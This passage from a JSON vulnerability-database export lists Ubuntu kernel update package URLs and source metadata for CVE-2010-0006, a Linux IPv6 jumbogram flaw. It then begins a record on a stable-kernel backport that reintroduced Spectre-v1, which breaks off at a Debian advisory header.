        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.31_2.6.31-19.56_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-virtual_2.6.27-17.45_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.27-17.45_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-lpia_2.6.31-19.56_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-386_2.6.31-19.56_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.82.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-xen_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-108.21.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-generic_2.6.27-17.45_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-generic_2.6.28-18.59_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-powerpc64-smp_2.6.31-19.56_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc-smp_2.6.24-27.65_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-generic_2.6.28-18.59_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64_2.6.15-55.82_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-386_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-server-bigiron_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/char-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4308"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-xen_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-server_2.6.27-17.45_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-generic_2.6.28-18.59_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.28-18-lpia_2.6.28-18.59_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-generic_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-server_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc_2.6.24-27.65_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-k8_2.6.15-55.82_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-server_2.6.31-19.56_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-386_2.6.31-19.56_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.28_2.6.28-18.59_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-server_2.6.31-19.56_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc-smp_2.6.15-55.82_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/38333/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/38133/"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-42611"
      },
      {
        "db": "BID",
        "id": "37810"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001087"
      },
      {
        "db": "PACKETSTORM",
        "id": "85473"
      },
      {
        "db": "PACKETSTORM",
        "id": "85958"
      },
      {
        "db": "PACKETSTORM",
        "id": "85610"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-0006"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-263"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-42611"
      },
      {
        "db": "BID",
        "id": "37810"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001087"
      },
      {
        "db": "PACKETSTORM",
        "id": "85473"
      },
      {
        "db": "PACKETSTORM",
        "id": "85958"
      },
      {
        "db": "PACKETSTORM",
        "id": "85610"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-0006"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-263"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2010-01-26T00:00:00",
        "db": "VULHUB",
        "id": "VHN-42611"
      },
      {
        "date": "2010-01-14T00:00:00",
        "db": "BID",
        "id": "37810"
      },
      {
        "date": "2010-02-26T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2010-001087"
      },
      {
        "date": "2010-01-21T10:22:03",
        "db": "PACKETSTORM",
        "id": "85473"
      },
      {
        "date": "2010-02-05T16:17:54",
        "db": "PACKETSTORM",
        "id": "85958"
      },
      {
        "date": "2010-01-25T10:44:34",
        "db": "PACKETSTORM",
        "id": "85610"
      },
      {
        "date": "2010-01-26T18:30:01.057000",
        "db": "NVD",
        "id": "CVE-2010-0006"
      },
      {
        "date": "2010-01-26T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201001-263"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-02-13T00:00:00",
        "db": "VULHUB",
        "id": "VHN-42611"
      },
      {
        "date": "2015-05-07T17:09:00",
        "db": "BID",
        "id": "37810"
      },
      {
        "date": "2014-04-01T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2010-001087"
      },
      {
        "date": "2023-02-13T02:20:57.793000",
        "db": "NVD",
        "id": "CVE-2010-0006"
      },
      {
        "date": "2023-04-27T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201001-263"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-263"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux Kernel  IPv6 jumbogram Vulnerability in processing",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001087"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "code problem",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-263"
      }
    ],
    "trust": 0.6
  }
}

var-201909-1049
Vulnerability from variot

A backporting error was discovered in the Linux stable/longterm kernel 4.4.x through 4.4.190, 4.9.x through 4.9.190, 4.14.x through 4.14.141, 4.19.x through 4.19.69, and 5.2.x through 5.2.11. Misuse of the upstream "x86/ptrace: Fix possible spectre-v1 in ptrace_get_debugreg()" commit reintroduced the Spectre vulnerability that it aimed to eliminate. This occurred because the backport process depends on cherry picking specific commits, and because two (correctly ordered) code lines were swapped. Linux Kernel Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability stems from configuration errors in network systems or products during operation. The following products and versions are affected: Linux kernel 4.4.x to 4.4.190, 4.9.x to 4.9.190, 4.14.x to 4.14.141, 4.19.x to 4.19.69, 5.2 .x versions up to 5.2.11. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512


Debian Security Advisory DSA-4531-1 security@debian.org https://www.debian.org/security/ Salvatore Bonaccorso September 25, 2019 https://www.debian.org/security/faq


